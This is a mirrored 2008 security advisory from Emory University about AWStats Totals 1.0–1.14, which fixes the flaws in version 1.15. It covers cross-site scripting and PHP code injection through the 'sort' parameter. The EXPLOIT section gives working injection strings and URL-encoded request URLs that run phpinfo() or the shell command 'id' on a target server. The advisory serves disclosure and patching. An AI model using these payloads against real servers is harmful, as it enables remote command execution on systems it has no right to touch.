SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Multiple Vulnerabilities in AWStats Totals


Arrow  SecurityAlert : 4218
Arrow  CVE : CVE-2008-3921
Arrow  CVE : CVE-2008-3922
Arrow  CWE : CWE-79
Arrow  CWE : CWE-94
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : Yes
Arrow  Exploit Available : No
Arrow  Credit : Elliot Kendall
Arrow  Published : 06.09.2008

Arrow  Affected Software : Telartis_bv, Awstats_totals, 1.0
Telartis_bv, Awstats_totals, 1.1
Telartis_bv, Awstats_totals, 1.11
Telartis_bv, Awstats_totals, 1.13
Telartis_bv, Awstats_totals, 1.14



Arrow  Advisory Content :  

Emory University UTS Security Advisory EMORY-2008-01

Topic: Multiple Vulnerabilities in AWStats Totals

Original release date: August 26, 2008

SUMMARY
=======

Telartis's AWStats Totals program is vulnerable to command execution
and cross site scripting attacks. A remote attacker could exploit
these vulnerabilities to run arbitrary commands on the system with the
permissions of the web server.

AFFECTED SOFTWARE
=================

* AWStats Totals 1.0 - 1.14

UNAFFECTED
==========

* AWStats Totals >= 1.15

IMPACT
======

A remote attacker could exploit these vulnerabilities to run arbitrary
commands on the web server's host operating system.

DETAILS
=======

AWStats Totals takes three URL parameters, "month," "year," and
"sort," and uses them without checking them for validity.

The program uses the month and year parameters in output it displays
to the user. It will display any HTML or Javascript code included in
these parameters, which the user's browser will then render.

The program uses the sort parameter to build an anonymous PHP function
with the create_function() function.

> function multisort(&$array, $key) {
> $cmp = create_function('$a, $b',
> 'if ($a["'.$key.'"] == $b["'.$key.'"]) return 0;'.
> 'return ($a["'.$key.'"] > $b["'.$key.'"]) ? -1 : 1;');
> usort($array, $cmp);
> }
>
> if ($sort == 'config') sort($rows); else multisort($rows, $sort);

Taking care to match properly the quotes and angle brackets, it is
possible to insert PHP expressions into the code for the function. For
example, to run the phpinfo() function, one might set sort to this
value:

"].phpinfo().$a["

Since any code one injects gets run multiple times, however, it may be
useful to exit the program after a single invocation:

"].phpinfo().exit().$a["

It is also possible to insert PHP expressions through the use of
variable expansion within strings on newer versions of PHP:

{${phpinfo()}}{${exit()}}

SOLUTION
========

Upgrade to AWStats Totals 1.15.

http://www.telartis.nl/xcms/awstats/

EXPLOIT
=======

The following examples require that magic quotes be disabled, but will
work on all versions of PHP.

This example will display phpinfo().

http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%
2eexit%28%29%2e%24a%5b%22

This example will run the "id" command on the target system.

http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27
id%27%29%2eexit%28%29%2e%24a%5b%22

======

The following examples require a version of PHP which parses function
calls inside strings (5+, some versions of 4?), but will work if magic
quotes are enabled.

This example will display phpinfo().

http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%
7d%7d%7b%24%7bexit%28%29%7d%7d

This example will run the "id" command on the target system.

http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr
(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d

ACKNOWLEDGMENTS
===============

Thanks to Telartis B.V. and Jeroen de Jong for quickly releasing an
updated version and for assisting with this advisory.

DISCLAIMER
==========

The information in this advisory is provided by Emory as a courtesy
and without any representations or warranties. Recipients are
advised to conduct their own investigation and due diligence before
relying on its contents.

REVISION HISTORY
================

2008-08-26 original release



Arrow  References :

http://www.telartis.nl/xcms/awstats/
http://xforce.iss.net/xforce/xfdb/44706
http://www.securityfocus.com/archive/1/archive/1/495770/100/0/threaded
http://www.frsirt.com/english/advisories/2008/2442
http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt
http://secunia.com/advisories/31630




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.